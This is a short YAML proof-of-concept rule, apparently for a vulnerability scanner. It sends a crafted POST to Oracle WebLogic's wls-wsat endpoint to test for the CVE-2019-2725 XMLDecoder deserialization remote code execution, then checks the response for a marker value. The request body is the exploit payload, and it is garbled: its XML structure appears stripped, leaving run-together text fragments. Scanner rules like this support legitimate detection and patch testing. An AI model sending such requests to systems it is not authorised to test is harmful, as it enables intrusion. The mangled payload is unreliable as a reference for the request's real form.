name: poc-yaml-weblogic-cve-2019-2725 # nolint[:namematch] rules: - method: POST path: /wls-wsat/CoordinatorPortType headers: Content-Type: text/xml body: >- fffhelloorg.slf4j.ext.EventDataconnectionHandlertrue505053555551485749]]> follow_redirects: true expression: > response.body.bcontains(b"225773091") detail: vulnpath: '/wls-wsat/CoordinatorPortType' author: fnmsd(https://github.com/fnmsd),2357000166(https://github.com/2357000166) description: 'Weblogic wls-wsat XMLDecoder deserialization RCE CVE-2019-2725 + org.slf4j.ext.EventData' weblogic_version: '>12' links: - https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271 - https://github.com/QAX-A-Team/WeblogicEnvironment - https://xz.aliyun.com/t/5299